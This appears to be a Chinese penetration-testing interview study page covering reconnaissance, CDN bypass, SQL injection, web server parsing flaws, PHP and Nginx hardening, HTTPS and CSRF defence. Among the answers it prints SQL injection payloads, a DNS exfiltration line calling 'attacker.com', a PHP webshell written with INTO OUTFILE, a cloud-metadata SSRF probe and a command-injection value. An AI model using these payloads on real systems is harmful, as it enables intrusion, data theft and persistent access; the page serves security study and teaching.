2025年滲透測試面試題總結-2025年HW(護網面試) 34(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

?2025年HW(護網面試) 34

一、網站信息收集

核心步驟與工具

二、CDN繞過與真實IP獲取

6大實戰方法

三、常見漏洞原理與防御

四大高危漏洞對比

四、SQL注入檢測與盲注

注入點探測流程

時間盲注核心函數

五、Sleep函數被過濾的替代方案

4種繞過方式

六、SQL注入拿Shell的條件

七、網站絕對路徑獲取

7大途徑

八、Web服務器解析漏洞

經典案例解析

九、Nginx安全配置

6項關鍵配置

十、PHP審計流程

四步代碼審計法

十一、PHP防注入方案

3層防御體系

十二、PHP安全配置

十三、Web滲透流程

五階段模型

十四、HTTP協議核心問題

十五、HTTPS建立過程

TLS握手六步

十六、CSRF防御機制

Token防御原理

其他防御方案

?

?2025年HW(護網面試) 34

1、網站信息收集
2、怎么尋找真實IP(cdn繞過)
3、常見漏洞原理和防范
4、sql怎么找注入點、盲注
5、敘述一下時間盲注原理以及用到的各種函數
6、sleep函數被過濾怎么辦?
7、sql注入能拿shell么,需要什么權限
8、怎么獲得網站的絕對路徑?
9、web服務器解析漏洞了解么?
10、Nginx安全配置相關
11、PHP審計流程
12、php怎么防注入  
13、php安全配置了解么  
14、web滲透流程
15、http了解么、長連接還是短連接、談談對http無狀態的理解。
16、bp抓https包的原理
17、https實現過程
18、防御csrf的方式?token防御csrf的原理? 

一、網站信息收集

核心步驟與工具
類別方法工具示例
基礎架構HTTP頭分析、端口掃描Nmap, Wappalyzer
子域名證書透明度、DNS爆破Amass, Subfinder
目錄文件敏感文件掃描、備份文件探測Dirsearch, Wayback Machine
關聯資產反向IP查詢、Whois信息關聯Shodan, Fofa

二、CDN繞過與真實IP獲取

6大實戰方法
  1. 歷史解析記錄
    • 查詢DNS歷史:SecurityTrails, ViewDNS.info
  2. 全球Ping檢測
    • 利用不同地區節點:Ping + ASN歸屬分析 → 識別非CDN IP
  3. 子域名探測
    • www域名有CDN → 嘗試maildev等未配置CDN的子域
  4. 協議漏洞利用
    • SSRF響應:http://xxx.com/?url=http://169.254.169.254 (云元數據)
  5. 郵件服務器追蹤
    • 分析郵件頭Received字段獲取真實IP
  6. DNS記錄泄露
    • SPF記錄中的ip4:聲明(如v=spf1 ip4:203.0.113.1 -all

三、常見漏洞原理與防御

四大高危漏洞對比
漏洞類型原理防御方案
SQL注入用戶輸入拼接SQL語句參數化查詢(PreparedStatement)
XSS惡意腳本注入頁面CSP頭:Content-Security-Policy
SSRF服務端請求偽造內網資源白名單校驗URL + 禁用file://協議
RCE系統命令執行函數未過濾禁用危險函數(如eval())+ 權限最小化

四、SQL注入檢測與盲注

注入點探測流程
mermaidgraph LR A[輸入點檢測] --> B(單引號觸發錯誤) B --> C{返回異常?} C -->|是| D[報錯注入] C -->|否| E[布爾盲注檢測] E --> F(1' AND 1=1-- → 正常) F --> G(1' AND 1=2-- → 異常?) G -->|是| H[確認布爾盲注]
時間盲注核心函數
數據庫延時函數示例Payload
MySQLSLEEP()1' AND SLEEP(5)--
PostgreSQLpg_sleep()1' AND pg_sleep(5)--
MSSQLWAITFOR DELAY1'; WAITFOR DELAY '0:0:5'--

五、Sleep函數被過濾的替代方案

4種繞過方式
  1. 重載延時
    • MySQL:BENCHMARK(10000000, MD5('a'))
  2. 條件錯誤觸發
    • 1' AND IF(1=1, (SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS), 1/0)--
  3. 大查詢阻塞
    • SELECT * FROM all_tables t1, all_tables t2(制造笛卡爾積)
  4. 外帶數據延時
    • DNS查詢:1' AND LOAD_FILE(CONCAT('\\\\',(SELECT HEX(user)), '.attacker.com\\'))--

六、SQL注入拿Shell的條件

前提條件操作路徑
1. 文件寫權限secure_file_priv為空(MySQL)
2. 絕對路徑獲取通過報錯/配置文件泄露
3. Web目錄寫入寫入PHP一句話:
SELECT '<?=eval($_POST[1])?>' INTO OUTFILE '/var/www/shell.php'

七、網站絕對路徑獲取

7大途徑
  1. 報錯信息
    • PHP錯誤:Warning: include(/var/www/config.php) failed
  2. 配置文件
    • /etc/apache2/sites-enabled/000-default.confDocumentRoot
  3. 進程信息
    • Linux:/proc/self/cwd → 符號鏈接指向路徑
  4. 框架特性
    • Laravel:php artisan tinkerbase_path()
  5. 文件包含漏洞
    • 包含/proc/self/environ獲取環境變量
  6. 備份文件泄露
    • .git/index → 文件路徑痕跡
  7. 命令執行回顯
    • ; pwd; → 返回當前路徑

八、Web服務器解析漏洞

經典案例解析
服務器漏洞原理攻擊示例
IIS 6.0目錄名含.asp則所有文件按ASP解析/upload.asp/logo.jpg → JPG當ASP執行
Nginx <0.8路徑截斷:%00截斷文件名/test.php%00.jpg → PHP執行
Apache多后綴解析:.php.jpg 當PHP執行shell.php.jpg → 觸發PHP引擎

九、Nginx安全配置

6項關鍵配置
nginx# 1. 禁用敏感信息 server_tokens off; # 隱藏Nginx版本 # 2. 文件訪問限制 location ~* \.(ini|conf|env)$ { deny all; # 禁止訪問配置文件 } # 3. 防目錄遍歷 autoindex off; # 禁用目錄列表 # 4. 限制HTTP方法 if ($request_method !~ ^(GET|POST)$ ) { return 444; # 非GET/POST請求直接斷開 } # 5. 防路徑穿越 location ~* \.\./ { deny all; # 阻斷../跳轉 } # 6. CSP防護 add_header Content-Security-Policy "default-src 'self'";

十、PHP審計流程

四步代碼審計法
mermaidgraph TB A[敏感函數定位] --> B[參數回溯] B --> C{輸入是否可控?} C -->|是| D[過濾機制分析] D --> E[構造PoC驗證]

十一、PHP防注入方案

3層防御體系
  1. 輸入層過濾
    • filter_var($input, FILTER_SANITIZE_STRING)
  2. 執行層隔離
    • PDO預處理:$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
  3. 輸出層轉義
    • HTML輸出:htmlspecialchars($str, ENT_QUOTES)

十二、PHP安全配置

配置項安全值作用
expose_phpOff隱藏PHP版本
disable_functionssystem,exec,passthru禁用危險函數
open_basedir/var/www限制文件訪問范圍
session.cookie_httponly1防JS竊取Session

十三、Web滲透流程

五階段模型
  1. 信息收集:資產測繪 + 指紋識別
  2. 漏洞探測:自動掃描 + 手動驗證
  3. 漏洞利用:武器化Payload投遞
  4. 權限維持:Webshell + 后門安裝
  5. 橫向移動:憑證竊取 + 內網漫游

十四、HTTP協議核心問題

問題技術解析
長連接 vs 短連接長連接:Connection: keep-alive(復用TCP連接)
短連接:每次請求新建連接
無狀態協議不記錄請求間狀態 → 需Cookie/Session維持會話
HTTPS抓包原理中間人攻擊:BP生成偽證書 + 客戶端信任CA根證書

十五、HTTPS建立過程

TLS握手六步
  1. Client → Server:ClientHello(支持密碼套件列表)
  2. Server → Client:ServerHello(選定密碼套件)+ 證書
  3. Client驗證證書合法性(CA鏈校驗)
  4. Client生成隨機對稱密鑰 → 用證書公鑰加密發送
  5. Server用私鑰解密獲取對稱密鑰
  6. 雙方用對稱密鑰加密通信

十六、CSRF防御機制

Token防御原理
mermaidgraph LR A[用戶登錄] --> B[服務端生成Token存入Session] B --> C[Token嵌入表單隱藏域] C --> D[提交請求時驗證Token] D -->|匹配| E[執行操作] D -->|不匹配| F[拒絕請求]
其他防御方案
  • SameSite CookieSet-Cookie: session=xxx; SameSite=Lax
  • 雙重Cookie驗證:請求頭攜帶Cookie + Body攜帶Token
  • 驗證碼挑戰:敏感操作需二次驗證

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/88179.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/88179.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/88179.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

螢石全新上線企業AI對話智能體,開啟IoT人機交互新體驗

一、什么是螢石AI對話智能體&#xff1f;如何讓設備聽得到、聽得懂&#xff1f;這次螢石發布的AI對話Agent&#xff0c;讓設備能進行自然、流暢、真人感的AI對話智能體&#xff0c;幫助開發者打造符合業務場景的AI對話智能體能力&#xff0c;實現全雙工、實時打斷、可擴展、對話…

智紳科技:以科技為翼,構建養老安全守護網

隨著我國老齡化進程加速&#xff0c;2025年60歲以上人口突破3.2億&#xff0c;養老安全問題成為社會關注的焦點。智紳科技作為智慧養老領域的領軍企業&#xff0c;以“科技賦能健康&#xff0c;智慧守護晚年”為核心理念&#xff0c;通過人工智能、物聯網、大數據等技術融合&am…

矩陣系統源碼部署實操指南:搭建全解析,支持OEM

矩陣系統源碼部署指南矩陣系統是一種高效的數據處理框架&#xff0c;適用于大規模分布式計算。以下為詳細部署步驟&#xff0c;包含OEM支持方案。環境準備確保服務器滿足以下要求&#xff1a;操作系統&#xff1a;Linux&#xff08;推薦Ubuntu 18.04/CentOS 7&#xff09;硬件配…

基于python的個人財務記賬系統

博主介紹&#xff1a;java高級開發&#xff0c;從事互聯網行業多年&#xff0c;熟悉各種主流語言&#xff0c;精通java、python、php、爬蟲、web開發&#xff0c;已經做了多年的畢業設計程序開發&#xff0c;開發過上千套畢業設計程序&#xff0c;沒有什么華麗的語言&#xff0…

從 CODING 停服到極狐 GitLab “接棒”,軟件研發工具市場風云再起

CODING DevOps 產品即將停服的消息&#xff0c;如同一顆重磅炸彈&#xff0c;在軟件研發工具市場炸開了鍋。從今年 9 月開始&#xff0c;CODING 將陸續下線其 DevOps 產品&#xff0c;直至 2028 年 9 月 30 日完全停服。這一變動讓眾多依賴 CODING 平臺的企業和個人開發者陷入了…

#滲透測試#批量漏洞挖掘#HSC Mailinspector 任意文件讀取漏洞(CVE-2024-34470)

免責聲明 本教程僅為合法的教學目的而準備&#xff0c;嚴禁用于任何形式的違法犯罪活動及其他商業行為&#xff0c;在使用本教程前&#xff0c;您應確保該行為符合當地的法律法規&#xff0c;繼續閱讀即表示您需自行承擔所有操作的后果&#xff0c;如有異議&#xff0c;請立即停…

深入解析C++驅動開發實戰:優化高效穩定的驅動應用

深入解析C驅動開發實戰&#xff1a;優化高效穩定的驅動應用 在現代計算機系統中&#xff0c;驅動程序&#xff08;Driver&#xff09;扮演著至關重要的角色&#xff0c;作為操作系統與硬件設備之間的橋梁&#xff0c;驅動程序負責管理和控制硬件資源&#xff0c;確保系統的穩定…

SNIProxy 輕量級匿名CDN代理架構與實現

&#x1f310; SNIProxy 輕量級匿名CDN代理架構與實現 &#x1f3d7;? 1. 整體架構設計 &#x1f539; 1.1 系統架構概覽 #mermaid-svg-S4n74I2nPLGityDB {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-S4n74I2nP…

Qt的信號與槽(一)

Qt的信號與槽&#xff08;一&#xff09;1.信號和槽的基本認識2.connect3.關閉窗口的按鈕4.函數的根源5.形參和實參的類型&#x1f31f;hello&#xff0c;各位讀者大大們你們好呀&#x1f31f;&#x1f31f; &#x1f680;&#x1f680;系列專欄&#xff1a;【Qt的學習】 &…

springMVC02-視圖解析器、RESTful設計風格,靜態資源訪問配置

一、SpringMVC 的視圖在 SpringMVC 中&#xff0c;視圖的作用渲染數據&#xff0c;將模型 Model (將控制器&#xff08;Controller&#xff09;)中的數據展示給用戶。在 Java 代碼中&#xff0c;視圖由接口 org.springframework.web.servlet.View 表示SpringMVC 視圖的種類很多…

Go中使用Google Authenticator

現在為了安全Google二次驗證使用越來越平凡了&#xff0c;所以我們自己做的一些產品中&#xff0c;也會用到Google Authenticator。 介紹 Google Authenticator采用的算法是TOTP&#xff08;Time-Based One-Time Password基于時間的一次性密碼&#xff09;&#xff0c;其核心內…

ReactNative【實戰系列教程】我的小紅書 4 -- 首頁(含頂欄tab切換,橫向滾動頻道,頻道編輯彈窗,瀑布流布局列表等)

最終效果 頂欄 modules/index/components/topBar.tsx import icon_daily from "/assets/images/icon_daily.png"; import MaterialIcons from "expo/vector-icons/MaterialIcons"; import { useCallback, useState } from "react"; import { Im…

告別Root風險:四步構建安全高效的服務器管理體系

當整個開發團隊都使用root賬號操作服務器&#xff0c;且重要數據無備份時&#xff0c;系統如同行走在懸崖邊緣。本文將分享一套經過驗證的四步解決方案&#xff0c;幫助團隊快速提升主機安全性。 為什么必須告別Root賬號&#xff1f; 直接使用root賬號的風險&#xff1a; &am…

【IM項目筆記】1、WebSocket協議和服務端推送Web方案

這里寫自定義目錄標題 1、HTTP和WebSocket協議2、WebSocket3、Http VS WebSocket4、WebSocket - 建立連接5、服務端推送Web方案(1) 短輪詢(2) 長輪詢(3) WebSocket長連接1、HTTP和WebSocket協議 ?? HTTP請求的特點:通信只能由客戶端發起。所以,早期很多網站為了實現推送技…

【深度學習新浪潮】什么是上下文長度?

大型語言模型(LLM)的上下文長度是指模型在處理當前輸入時能夠有效利用的歷史文本長度,通常以token(如單詞、子詞或標點)為單位衡量。例如,GPT-4支持128K token的上下文,而Llama 4 Scout甚至達到了10M token的驚人規模。這一指標直接影響模型在長文檔理解、多輪對話等復雜…

Modbus TCP轉Profibus網關輕松讓流量計與DCS通訊

Modbus TCP轉Profibus網關輕松讓流量計與DCS通訊工業自動化系統中&#xff0c;協議差異常成為設備互聯的“語言障礙”。例如&#xff0c;當流量計采用Modbus TCP協議&#xff0c;而DCS系統僅支持Profibus DP時&#xff0c;如何實現無縫通信&#xff1f;本文將結合技術原理與真實…

云時代下的IT資產管理自動化實踐

前言伴隨著企業數字化轉型進程的加快&#xff0c;IT資產規模日益龐大且復雜。傳統的手工IT資產登記、跟蹤與管理方式&#xff0c;效率低下且容易出錯&#xff0c;已經無法滿足現代企業對于敏捷化、可視化和自動化運維的需求。云計算、容器化、微服務架構的普及又進一步加快了資…

Windows主機遠程桌面連接Ubuntu24.04主機

最近剛剛換了臺新電腦&#xff0c;想著空出老電腦直接裝一個Ubuntu系統給新電腦遠程連接過去進行開發&#xff0c;就可以完美避開雙系統老是要重啟切換的問題。仔細一查發現Ubuntu24.04自帶了RDP遠程工具&#xff0c;大喜&#xff01;于是探究了一番。 本篇文章將介紹本人探究…

Android WebView 性能優化指南

Android WebView 性能優化指南 WebView優化需要從多個維度綜合考慮&#xff1a;優化維度關鍵措施預期收益初始化延遲加載、實例復用降低內存峰值渲染硬件加速、合理布局提升流暢度20%內存獨立進程、泄漏防護減少OOM風險網絡緩存策略、資源攔截節省流量30%安全漏洞修復、接口限制…

Linux下SPHinXsys源碼編譯安裝及使用

目錄 軟件介紹 基本依賴 一、源碼下載 二、安裝依賴庫 1、BLAS 2、LAPACK 3、oneTBB 4、googletest 5、Boost 6、Simbody 7、pybind11 8、Eigen3 三、解壓縮 四、編譯安裝 軟件介紹 SPHinXsys是胡湘渝博士團隊采用C/C開發的一個開源無網格、多分辨率、多物理場、…